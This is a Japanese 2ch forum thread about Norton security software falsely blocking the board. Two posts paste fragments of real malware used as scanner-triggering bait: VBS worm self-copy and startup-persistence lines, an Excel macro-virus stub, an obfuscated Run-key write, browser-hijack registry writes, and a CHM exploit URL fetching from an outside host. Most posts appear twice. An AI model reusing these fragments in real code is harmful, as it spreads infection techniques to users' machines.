詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
探検
ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
1動け動けウゴウゴ2ちゃんねる
2005/11/28(月) 16:08:40ID:bR9gbCGm02006/07/09(日) 11:57:57ID:kh5GFJWj0
2006/07/09(日) 14:39:36ID:t51lbUR70
まあとにかくNIS2004だと相変わらず反応するわけだ
972960
2006/07/09(日) 15:08:39ID:1L5D8Za90 >>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
973960
2006/07/09(日) 15:36:17ID:1L5D8Za90 連投すまそ、
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
2006/07/09(日) 19:43:03ID:xL1TwppA0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
975動け動けウゴウゴ2ちゃんねる
2006/07/11(火) 20:28:47ID:ic76RAqx0 今まで>>974みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
2006/07/12(水) 02:08:08ID:YkmmZvA40
専ブラったっていろいろあるから
NGワードの処理の仕方も同じじゃない
NGワードの処理の仕方も同じじゃない
2006/07/12(水) 09:33:42ID:UPljDXSZ0
専ブラは変えてないなら
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
2006/07/12(水) 18:52:17ID:KcXuCgUg0
シリア語ブラクラでノートンが誤反応するのか??
979977
2006/07/12(水) 20:53:52ID:UPljDXSZ0 ごめん、シリア語ブラクラはノートンとは関係ないね。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
2006/07/16(日) 22:37:21ID:ofCNhrjG0
t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
2006/07/19(水) 12:50:11ID:7373/lmb0
レス数が950を超えています。1000を超えると書き込みができなくなります。
ニュース
- 「100%中居さんは負ける」守秘義務解除してもリスクを負う可能性が… 弁護士・桜井ヤスノリ氏の見解 [muffin★]
- 【芸能】西内まりやが芸能界引退へ 「自分らしい人生を見つけていきたい」理由のひとつに「今年になって身内のトラブルが発覚」 [ニーニーφ★]
- 中居正広氏の心中に渦巻く“第三者委員会への不信感” 「最初から“悪者扱い”されているように感じていた」「高圧的な調査だった」★2 [Ailuropoda melanoleuca★]
- 須藤元気氏「原発はかつて否定していたが、現在はエネルギー安全保障と現実的対応から必要だと考える」 [お断り★]
- あのちゃん、Xで『クソダサい服』と言われた服をAmazonで注文「ダサいとか気にすな、好きな服を着なさい^ㅁ^」と正論コメント [muffin★]
- 【調査】7割が習い事なし 世帯年収が300万円未満の低所得世帯の小学生―体験格差に懸念 ★2 [ぐれ★]
- ガンダムGquuuuuX、ガチで終わる、考察要素だと思われたモノがすべからくアイドルオタクの監督の趣味と判明して終わる ★6 [197015205]
- ▶白上フブキの中身とガチ子作りSEXしたいんやが
- 女「こいつ童貞。童貞の靴してる」 [279254606]
- (ヽ゜ん゜) 「買った株、半額になったわ」👈買ってそうな株 [943688309]
- 女子高生におっさんの趣味をさせるアニメじゃなくて
- 【悲報】ガノタさんガンダムGquuuuuXを見て脳破壊され終わる「ガンダムが穢された、レイプされた女の気持ち」 [527893826]